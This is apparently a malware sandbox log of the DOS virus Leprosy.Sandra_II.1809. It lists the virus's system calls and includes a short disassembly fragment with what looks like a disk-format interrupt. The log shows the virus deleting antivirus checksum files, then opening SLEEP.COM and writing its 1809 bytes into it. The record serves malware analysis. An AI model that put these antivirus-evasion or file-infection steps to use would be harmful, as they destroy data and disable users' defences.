Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Sandra_II.1809

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:23:34.907355605Z	44	PC: 12c2d \| Get time 0x12c2d: cmp byte ptr [0x123], 0x80 0x12c32: jne 0x12c4f 0x12c34: mov byte ptr [0x123], 0x82 0x12c39: jmp 0x12c54 0x12c3b: sub ch, ch 0x12c3d: sub al, al 0x12c3f: mov cl, 6 0x12c41: shl al, cl 0x12c43: mov cl, al 0x12c45: or cl, 1 0x12c48: mov ax, 0x500 0x12c4b: int 0x13 0x12c4d: int 0x20 0x12c4f: mov byte ptr [0x123], 0x80 0x12c54: mov ah, byte ptr [0x12d] 0x12c58: mov byte ptr [0x122], ah 0x12c5c: mov byte ptr [0x15a], ah 0x12c60: mov ah, byte ptr [0x10b] 0x12c64: mov byte ptr [0x11f], ah 0x12c68: mov byte ptr [0x155], ah
2018-12-17T22:23:34.910497158Z	250	PC: 12fd4 \| UNKNOWN!
2018-12-17T22:23:34.911691391Z	255	PC: 12ff7 \| UNKNOWN!
2018-12-17T22:23:34.912409853Z	65	PC: 13004 \| Delete file (Filename = '')
2018-12-17T22:23:34.914694012Z	60	PC: 13026 \| Create or truncate file
2018-12-17T22:23:34.919946549Z	60	PC: 1302d \| Create or truncate file
2018-12-17T22:23:34.924244465Z	65	PC: 13034 \| Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:23:34.930348316Z	65	PC: 1303b \| Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:23:34.936418822Z	65	PC: 13042 \| Delete file (Filename = 'C:\CPAV\CHKLIST.CPS')
2018-12-17T22:23:34.941608644Z	65	PC: 13049 \| Delete file (Filename = 'C:\NAV_._NO')
2018-12-17T22:23:34.946847693Z	65	PC: 13050 \| Delete file (Filename = 'C:\NOVIRCVR.CTS')
2018-12-17T22:23:34.952411972Z	65	PC: 13057 \| Delete file (Filename = 'C:\NOVIPERF.DAT')
2018-12-17T22:23:34.958382082Z	65	PC: 1305e \| Delete file (Filename = 'C:\TOOLKIT\FILES.LST')
2018-12-17T22:23:34.963548994Z	65	PC: 13065 \| Delete file (Filename = 'C:\FSIZES.QCV')
2018-12-17T22:23:34.969069054Z	65	PC: 1306c \| Delete file (Filename = 'C:\UNTOUCH\UT.UT1')
2018-12-17T22:23:34.973278146Z	65	PC: 13073 \| Delete file (Filename = 'C:\UNTOUCH\UT.UT2')
2018-12-17T22:23:34.977058605Z	65	PC: 1307a \| Delete file (Filename = 'C:\VS.VS')
2018-12-17T22:23:34.981431996Z	78	PC: 13093 \| Find first file
2018-12-17T22:23:34.985661474Z	78	PC: 130a5 \| Find first file
2018-12-17T22:23:34.99021331Z	62	PC: 13107 \| Close file
2018-12-17T22:23:34.992241977Z	61	PC: 13110 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:34.996601756Z	64	PC: 12a6d \| Write file or device (Write 1809 bytes on handle 0)
2018-12-17T22:23:35.008178049Z	87	PC: 13139 \| Get or set file date and time
2018-12-17T22:23:35.009866434Z	62	PC: 13141 \| Close file
2018-12-17T22:23:35.017396011Z	67	PC: 1314e \| Get or set file attributes